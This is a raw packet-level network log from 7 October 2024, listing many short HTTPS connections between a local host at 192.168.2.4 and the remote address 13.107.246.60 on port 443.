                Oct 7, 2024 03:27:06.867533922 CEST49885443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.867582083 CEST4434988513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.868086100 CEST49885443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.868093014 CEST4434988513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.881397963 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.881464005 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.881530046 CEST49884443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.881562948 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.881597996 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.881654978 CEST49884443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.881922960 CEST49884443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.881923914 CEST49884443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.881959915 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.881983042 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.884840012 CEST49889443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.884885073 CEST4434988913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.885180950 CEST49889443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.885370016 CEST49889443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.885387897 CEST4434988913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.926506996 CEST4434988613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.927445889 CEST49886443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.927469969 CEST4434988613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.928117037 CEST49886443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.928122044 CEST4434988613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.934551954 CEST4434988713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.935331106 CEST49887443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.935358047 CEST4434988713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.935834885 CEST49887443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.935846090 CEST4434988713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.958095074 CEST4434988813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.960786104 CEST49888443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.960803032 CEST4434988813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.961584091 CEST49888443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.961592913 CEST4434988813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.965300083 CEST4434988513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.965444088 CEST4434988513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.965933084 CEST49885443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.966113091 CEST49885443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.966134071 CEST4434988513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.966150999 CEST49885443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.966157913 CEST4434988513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.969677925 CEST49890443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.969702005 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.970232964 CEST49890443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.970731020 CEST49890443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.970746994 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.029153109 CEST4434988613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.029315948 CEST4434988613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.029436111 CEST4434988613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.029458046 CEST49886443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.029974937 CEST49886443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.030249119 CEST49886443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.030287981 CEST4434988613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.030344009 CEST49886443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.030359983 CEST4434988613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.034163952 CEST49891443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.034255981 CEST4434989113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.034416914 CEST49891443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.035048008 CEST49891443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.035083055 CEST4434989113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.063198090 CEST4434988813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.063325882 CEST4434988813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.063436985 CEST49888443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.063764095 CEST49888443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.063791037 CEST4434988813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.063843012 CEST49888443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.063857079 CEST4434988813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.066366911 CEST49892443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.066462994 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.066592932 CEST49892443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.066920996 CEST49892443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.066955090 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.106364012 CEST4434988713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.106439114 CEST4434988713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.106517076 CEST49887443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.108253002 CEST49887443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.108253002 CEST49887443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.108287096 CEST4434988713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.108309984 CEST4434988713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.151117086 CEST49893443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.151159048 CEST4434989313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.151267052 CEST49893443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.151886940 CEST49893443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.151895046 CEST4434989313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.525204897 CEST4434988913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.526357889 CEST49889443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.526417971 CEST4434988913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.526794910 CEST49889443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.526808977 CEST4434988913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.608118057 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.608673096 CEST49890443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.608697891 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.609169960 CEST49890443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.609181881 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.623541117 CEST4434988913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.623826981 CEST4434988913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.623895884 CEST49889443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.623950005 CEST49889443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.623950005 CEST49889443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.623984098 CEST4434988913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.624006033 CEST4434988913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.626545906 CEST49894443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.626580000 CEST4434989413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.626831055 CEST49894443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.626977921 CEST49894443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.626991034 CEST4434989413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.670515060 CEST4434989113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.670967102 CEST49891443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.671009064 CEST4434989113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.671412945 CEST49891443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.671418905 CEST4434989113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.707340956 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.707377911 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.707431078 CEST49890443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.707453012 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.707479000 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.707526922 CEST49890443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.707632065 CEST49890443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.707633018 CEST49890443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.707649946 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.707670927 CEST4434989013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.710295916 CEST49895443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.710354090 CEST4434989513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.710417986 CEST49895443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.710602045 CEST49895443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.710613966 CEST4434989513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.720184088 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.720577955 CEST49892443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.720596075 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.721112967 CEST49892443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.721117973 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.769773006 CEST4434989113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.769932032 CEST4434989113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.769989014 CEST49891443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.770035028 CEST49891443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.770056963 CEST4434989113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.770071983 CEST49891443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.770078897 CEST4434989113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.772432089 CEST49896443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.772471905 CEST4434989613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.772526026 CEST49896443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.772648096 CEST49896443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.772660971 CEST4434989613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.784918070 CEST4434989313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.785224915 CEST49893443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.785235882 CEST4434989313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.785675049 CEST49893443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.785679102 CEST4434989313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.820197105 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.820311069 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.820349932 CEST49892443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.820360899 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.820408106 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.820445061 CEST49892443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.820472956 CEST49892443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.820482969 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.820497036 CEST49892443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.820502043 CEST4434989213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.822647095 CEST49897443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.822674036 CEST4434989713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.822721004 CEST49897443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.822859049 CEST49897443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.822868109 CEST4434989713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.884258986 CEST4434989313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.884433031 CEST4434989313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.884474993 CEST49893443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.884516954 CEST49893443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.884526968 CEST4434989313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.884537935 CEST49893443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.884541988 CEST4434989313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.886514902 CEST49898443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.886526108 CEST4434989813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:07.886584044 CEST49898443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.886714935 CEST49898443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:07.886722088 CEST4434989813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.272392035 CEST4434989413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.273032904 CEST49894443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.273061037 CEST4434989413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.273538113 CEST49894443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.273542881 CEST4434989413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.350939035 CEST4434989513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.351865053 CEST49895443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.351896048 CEST4434989513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.352838039 CEST49895443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.352844000 CEST4434989513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.373605013 CEST4434989413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.373687983 CEST4434989413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.373737097 CEST49894443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.373956919 CEST49894443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.373974085 CEST4434989413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.373982906 CEST49894443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.373990059 CEST4434989413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.377121925 CEST49899443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.377168894 CEST4434989913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.377228022 CEST49899443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.377389908 CEST49899443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.377401114 CEST4434989913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.442770958 CEST4434989613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.443414927 CEST49896443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.443449974 CEST4434989613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.443996906 CEST49896443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.444001913 CEST4434989613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.449625969 CEST4434989513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.449776888 CEST4434989513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.449855089 CEST49895443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.449943066 CEST49895443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.449943066 CEST49895443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.449990988 CEST4434989513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.450021982 CEST4434989513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.452737093 CEST49900443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.452781916 CEST4434990013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.452842951 CEST49900443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.453069925 CEST49900443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.453083038 CEST4434990013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.501077890 CEST4434989713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.501727104 CEST49897443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.501746893 CEST4434989713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.502393961 CEST49897443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.502399921 CEST4434989713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.545573950 CEST4434989613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.545737028 CEST4434989613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.545794010 CEST49896443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.545975924 CEST49896443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.545994997 CEST4434989613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.546021938 CEST49896443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.546027899 CEST4434989613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.549499989 CEST49901443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.549560070 CEST4434990113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.549623013 CEST49901443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.549794912 CEST49901443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.549808025 CEST4434990113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.558826923 CEST4434989813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.559257984 CEST49898443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.559278011 CEST4434989813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.559685946 CEST49898443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.559690952 CEST4434989813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.606034040 CEST4434989713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.606133938 CEST4434989713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.606175900 CEST49897443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.606381893 CEST49897443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.606409073 CEST4434989713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.606421947 CEST49897443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.606429100 CEST4434989713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.609719038 CEST49902443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.609807014 CEST4434990213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.609894037 CEST49902443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.610054970 CEST49902443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.610081911 CEST4434990213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.662249088 CEST4434989813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.662336111 CEST4434989813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.662385941 CEST49898443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.662606001 CEST49898443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.662622929 CEST4434989813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.662631989 CEST49898443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.662637949 CEST4434989813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.667517900 CEST49903443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.667551994 CEST4434990313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:08.667620897 CEST49903443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.667927027 CEST49903443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:08.667957067 CEST4434990313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.015469074 CEST4434989913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.016458988 CEST49899443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.016539097 CEST4434989913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.017503977 CEST49899443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.017518997 CEST4434989913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.092886925 CEST4434990013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.097863913 CEST49900443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.097865105 CEST49900443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.097889900 CEST4434990013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.097908974 CEST4434990013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.113405943 CEST4434989913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.113524914 CEST4434989913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.113642931 CEST49899443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.114170074 CEST49899443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.114170074 CEST49899443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.114187956 CEST4434989913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.114191055 CEST4434989913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.119586945 CEST49904443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.119622946 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.119817019 CEST49904443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.119817019 CEST49904443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.119843960 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.184735060 CEST4434990113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.186193943 CEST49901443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.186233997 CEST4434990113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.187885046 CEST49901443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.187896013 CEST4434990113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.193687916 CEST4434990013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.193763018 CEST4434990013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.193808079 CEST4434990013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.194181919 CEST49900443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.194181919 CEST49900443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.194215059 CEST49900443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.194231033 CEST4434990013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.199898005 CEST49905443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.199944973 CEST4434990513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.203082085 CEST49905443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.203082085 CEST49905443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.203124046 CEST4434990513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.243969917 CEST4434990213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.244882107 CEST49902443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.244901896 CEST4434990213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.246665001 CEST49902443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.246673107 CEST4434990213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.283842087 CEST4434990113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.284116983 CEST4434990113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.284369946 CEST49901443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.284789085 CEST49901443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.284789085 CEST49901443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.284811020 CEST4434990113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.284822941 CEST4434990113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.293009043 CEST49906443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.293061018 CEST4434990613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.295418024 CEST49906443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.295418024 CEST49906443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.295454979 CEST4434990613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.327588081 CEST4434990313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.329396009 CEST49903443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.329421997 CEST4434990313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.330131054 CEST49903443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.330136061 CEST4434990313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.343107939 CEST4434990213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.343220949 CEST4434990213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.343434095 CEST49902443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.351831913 CEST49902443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.351831913 CEST49902443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.351850986 CEST4434990213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.351861954 CEST4434990213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.378937960 CEST49907443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.378978968 CEST4434990713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.379087925 CEST49907443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.379424095 CEST49907443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.379435062 CEST4434990713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.430150986 CEST4434990313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.430237055 CEST4434990313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.430574894 CEST49903443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.451605082 CEST49903443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.451625109 CEST4434990313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.451634884 CEST49903443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.451639891 CEST4434990313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.455101013 CEST49908443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.455189943 CEST4434990813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.455447912 CEST49908443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.461136103 CEST49908443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.461178064 CEST4434990813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.756244898 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.756881952 CEST49904443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.756900072 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.758459091 CEST49904443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.758464098 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.845824957 CEST4434990513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.846681118 CEST49905443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.846739054 CEST4434990513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.847279072 CEST49905443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.847290993 CEST4434990513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.854809999 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.854859114 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.854907036 CEST49904443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:09.854933023 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.854990005 CEST4434990413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:09.855030060 CEST49904443192.168.2.413.107.246.60
